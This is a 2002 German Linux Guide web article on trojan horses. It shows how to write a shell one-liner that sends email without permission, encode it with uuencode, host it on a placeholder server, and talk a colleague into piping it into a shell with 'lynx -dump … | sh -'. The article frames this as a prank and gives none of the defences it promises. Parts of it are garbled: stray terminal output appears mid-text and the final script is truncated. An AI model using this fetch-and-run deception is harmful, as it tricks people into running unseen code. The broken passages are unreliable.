Linux Guide - Trojanische Pferde

	L i n u x * G u i d e v o n * I n g o * B l e c h s c h m i d t * ( c ) * 2 0 0 1

Trojanische Pferde
Don Apr 18 19:28:01 MEST 2002
Trojanisches_Pferd Pferd Troia Troja mimencode uuencode uudecode Virus

Dieser Artikel erläutert die vielen Möglichkeiten Trojanischer Pferde, und wie man sie abwehren kann.

Druckbare Version
Man-Page
Sourcecode

Verwandte Artikel:

Versteckte Nachrichten
Sichere Passwörter generieren

      .~.   
      /V\   
     // \\  
    /(   )\ 
     ^`~'^

er Name "Trojanisches Pferd" kommt von der Antike: Volk A belagert Stadt B, kommt aber nicht hinein. Held C kommt auf die Idee, ein großes mit eigenen Soldaten besetztes Holzpferd zu bauen und es B zu überlassen. B fällt auf den Trick hinein und wird erobert.
Heute wird ein Programm, welches vorgibt, ein Spiel oder sonstiges wichtiges Programm zu sein, dem Computer schadet und/oder seinem Besitzer wertvolle Daten liefert. In M$ Windows ist es im Allgemeinen nicht schwer, ein Programm wie E-Mail zu verschicken, welches dann die Schadensfunktion(en) ausführt (via Outlook sogar automatisch). In Linux ist das was anderes: Binärprogramme laufen i.d.R. nur auf der Distribution, auf der sie kompiliert wurden. Und Shellskripte sind zu einsichtig: Jeder Befehl, der ausgeführt wird, kann (vor dem Start) eingesehen werden. Vorläufiges Fazit: Trojanische Pferde unter Linux sind unmöglich.
Leider ist dieses "unmöglich" etwas übertrieben: Für Newbies, das heißt Linuxern, die sich noch nicht so viel Wissen besitzen, ist es möglich: Hier ist der Quellcode für ein Programm, welches (ohne Erlaubnis des Benutzers) eine E-Mail verschickt:

E-Mail unerlaubt versenden
	echo 'Hallo, Welt!' \| mail -s .,-+= foo@bar.org

Wenn man nun das Programm mit uuencode "verschlüsselt", erhält man:

Verschlüsselung

Enter verification password: 
Today is Pungenday, the 35th day of Discord in the YOLD 3168.
P'tang!
     15 neue Mails:
Subject: Fwd: E-Kettenbriefe
Subject: E-Kettenbriefe
Subject: A
Subject: Bingo!
Subject: News
Anzahl Sekunden seit 1970: 1019151653
iblech@Hitachi:~/tLipps > cat Pfad/zum/Quelltext | uuencode -m - > /Pfad/zum/Er gebnis

Man erhält zum Beispiel:

Zwischenergebnis
	begin-base64 644 - ZWNobyAiSGFsbG8sIFdlbHQiIHwgbWFpbCAtcyAuLC0rPSBmb29AYmFyLm9y Zwo= ====

Nun muss man nur noch zwei Zeilen hinzufügen, und dann zum Beispiel auf einen Webserver stellen (im Beispiel AlphaCentauti.univer.sum):

Endergebnis, abzuspeichern in http://AlphaCentauri.univer.sum/troia
	cat <

Dann muss man nur noch dem lieben Kollegen sagen... "Ich habe ein witziges Programm im Internet entdeckt. Wenn du es ausführen willst, musst du nur 'lynx -dump http://AlphaCentauri.univer.sum/troia | sh -' eingeben!"
Viel Spaß beim mimencoden...

Document Informations:

Content-Type: text/html; charset=iso-8859-1
Author: Ingo Blechschmidt
Description: LinuxGuide - Dieser Artikel erläutert die vielen Möglichkeiten Trojanischer Pferde, und wie man sie abwehren kann.
Keywords: Trojanisches_Pferd, Pferd, Troia, Troja, mimencode, uuencode, uudecode, Virus, LinuxGuide
Robots: all
Copyright: Copyright (C) 2002 by Ingo Blechschmidt
Date: 2003-04-18T19:28:01+02:00

Stichwortverzeichnis | Neue Artikel | Übersicht | Codesnippets | Links | Copyright | Cool Stuff | Home | Druckbare Version | Manpage | Sourcecode |

Diesen Artikel kritisieren, kommentieren oder ergänzen
Einen Neuen Artikel schreiben

This website is distributed under the GNU Free Documentation License .